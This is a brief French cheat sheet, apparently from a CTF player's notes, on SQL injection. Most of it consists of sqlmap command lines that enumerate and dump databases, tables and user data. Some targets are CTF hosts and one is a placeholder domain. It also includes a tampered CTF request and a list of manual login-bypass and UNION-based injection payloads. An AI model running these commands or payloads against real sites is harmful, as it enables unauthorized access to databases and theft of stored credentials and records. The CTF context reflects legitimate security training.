meta données pour cette page
Découverte de l'outil sqlmap
C'est un outil pour faire des injections de manière automatique :
sqlmap -u page/id=51 --dbs sqlmap -u page/id=51 --tables -D $bdd sqlmap -u page/id=51 --columns -D $bdd -T $table sqlmap -u page/id=51 --dump -D $bdd -T $table -c $columns sqlmap -u "http://authent-service.insomni.hack/index.php" --method POST --data "username=admin" --level 5 --risk 3 --batch -v 6 sqlmap -u "http://authent-service.insomni.hack/index.php" --data=”login=iron” --method POST -D $BASE --dump all --batch
sqlmap -u "http://domaine.org/ch9/" --threads=4 --batch --data="login=admin&password=1234" --dbs sqlmap -u "http://domaine.org/ch9/" --threads=4 --batch --data="login=admin&password=1234" --dbms=SQLite --tables sqlmap -u "http://domaine.org/ch9/" --threads=4 --batch --data="login=admin&password=1234" --dbms=SQLite -D SQLite_masterdb -T users --dump
Autre exemple :
- Requête de type GET :
sqlmap -u "http://authent-service.insomni.hack/index.php?champ1=donnee1" --dbms Mysql
- Requête de type POST :
sqlmap -u "http://authent-service.insomni.hack/index.php" --data="champ1=donnee1" --dbms Mysql
Vu dans un CTF :
$ cat raw_request POST /?a=benchmark HTTP/1.1 Host: bitminer.insomni.hack User-Agent: Bitcoin Mining $couter 0.1 Beta 1337 Expect: 100-continue Content-Length: 148 Content-Type: application/x-www-form-urlencoded
sqlmap -r raw_request --tamper base64encode --prefix $'{"cid":"NOT-A-SANDBOX","cpu":"Intel(R) Core(TM) i5-4310U CPU @ 2.00GHz","gpu":"\' or 1=1 ' --suffix ' -- a"}' --skip-urlencode --level 5 --string go --technique B --dump
Manuel
Lors de la saison d'un formulaire ces entrées peuvent fonctionner :
' UNION SELECT 1# ' UNION SELECT TABLE_NAME FROM information_schema.tables;-- ' OR '1'='1 admin';-- admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/*
- Lister ligne par ligne les données qui peuvent être récupéré depuis un formulaire :
' OR 1 LIMIT 1,2 -- ' OR 1 LIMIT 2,3 --